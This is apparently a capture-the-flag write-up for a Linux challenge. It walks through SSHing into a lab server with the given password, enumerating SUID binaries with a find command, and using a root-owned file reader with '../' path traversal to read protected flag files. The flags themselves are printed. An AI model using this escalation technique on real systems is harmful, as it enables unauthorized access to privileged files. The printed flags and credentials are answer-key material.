Writeups
  • crypt0nite
  • CTFs
    • darkctf
      • Web
        • Simple SQL
      • Rev
        • helloworld
      • pwn
        • roprop
        • newPAX
      • OSINT
        • Find Cell
        • Dark Social Web
      • Linux
        • Linux Starter
        • Find Me
      • forensics
        • Wolfie's Contact
        • Free Games
        • AW
      • crypto
        • haXXor
        • Pipe Rhyme
    • csictf
      • Crypto
        • Mein Kampf
        • Rivest-Shamir-Adleman
      • Linux
        • AKA
      • Miscellaneous
        • No DIStractions
      • OSINT
        • Pirates of the Memorial
        • Commitment
        • Flying Places
        • Shaken
      • Pwn
        • Pwn Intended 0x1
        • Pwn Intended 0x2
        • Pwn Intended 0x3
        • Global Warming
        • Smash
        • Secret Society
      • Reversing
        • Blaise
        • RicknMorty
      • Web
        • Oreo
        • Mr. Rami
        • The Confused Deputy
    • NahamCon
      • Crypto
        • Unvreakable Vase
        • Ooo-La-La
        • HomeCooked
        • DocXor
      • Forensics
        • Volatile
        • Microsooft
        • Cow Pie
      • Miscellaneous
        • Fake File
        • Alkatraz
      • Mobile
        • CAndroid
        • Simple App
      • OSINT
        • New Year's Solutions
        • Tron
      • Pwn
        • Dangerous
      • Scripting
        • Rotten
        • Really Powerful Gnomes
      • Steganography
        • KSteg
      • Web
        • PHPhone Book
        • Official Business
        • Localghost
        • Agent 95
    • BSides Delhi
      • Thanks for Attending
      • Cookie Robot
    • hacktoberctf
      • Traffic Analysis
        • Evil Corp's Child 1, 2 and 3
        • Remotely Administered Evil 1 and 2
        • An Evil Christmas Carol 1 and 2
      • Forensics
        • Captured Memories
        • Amcaching In
      • Linux
        • Talking To The Dead
Powered by GitBook
On this page
  • Flags 1 and 2:
  • Flags 3 and 4:

Was this helpful?

Export as PDF
  1. CTFs
  2. hacktoberctf
  3. Linux

Talking To The Dead

Flags 1, 2, 3 and 4

Author: syyntax

We've obtained access to a server maintained by spookyboi. There are four flag files that we need you to read and submit (flag1.txt, flag2.txt, etc). Submit the contents of flag1.txt.

ssh hacktober@env.hacktober.io

Password: hacktober-Underdog-Truth-Glimpse

Flags 1 and 2:

SSHing in and running the command whoami we see we're logged in as luciafer.

Navigating to /home/luciafer/Documents, I ran ls -alt and the output was as follows:

luciafer@40504779afeb:~/Documents$ ls -alt
total 20
drwxrwxr-x 1 luciafer luciafer 4096 Oct  6 08:36 .
-rw-rw-r-- 1 luciafer luciafer   47 Oct  6 08:36 .flag2.txt
-rw-rw-r-- 1 luciafer luciafer   47 Oct  5 14:55 flag1.txt
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..

Since luciafer owns both these files, I can simply run cat flag1.txt and cat .flag2.txt to get the flags.

flag 1: flag{cb07e9d6086d50ee11c0d968f1e5c4bf1c89418c} flag 2: flag{728ec98bfaa302b2dfc2f716d3de7869f3eadcbf}

Flags 3 and 4:

After looking around, I found flag3.txt located at /home/spookyboi/Documents/flag3.txt and flag4.txt at /root/flag4.txt. Since luciafer doesn't have sufficient perms to read these files, I ran the command find / -perm -u=s -type f 2>/dev/null to find SUID files.

SUID is a special file permission for executable files, which enables other users to run the file with effective permissions of the file owner. This means we could privilege escalate to root or a higher privileged user, giving us perms to read the flag files.

This was the output: 

luciafer@40504779afeb:/root$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/local/bin/ouija
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

The program ouija jumped out to me, so i tried running it:

luciafer@40504779afeb:/root$ /usr/local/bin/ouija
OUIJA 6.66 - Read files in the /root directory
Usage: ouija [FILENAME]
EXAMPLES:
    ouija file.txt
    ouija read.meluciafer@40504779afeb:/root$

Excellent! it reads files in the /root directory, meaning we simply go

luciafer@40504779afeb:/root$ /usr/local/bin/ouija flag4.txt
flag{4781cbffd13df6622565d45e790b4aac2a4054dc}

We use the same program to get the flag from flag3.txt as so:

luciafer@40504779afeb:/root$ /usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt 
flag{445b987b5b80e445c3147314dbfa71acd79c2b67}

Note: as we start in the /root directory, so must go back one (../) to navigate to flag3.txt.

By das

PreviousLinux

Last updated 4 years ago

Was this helpful?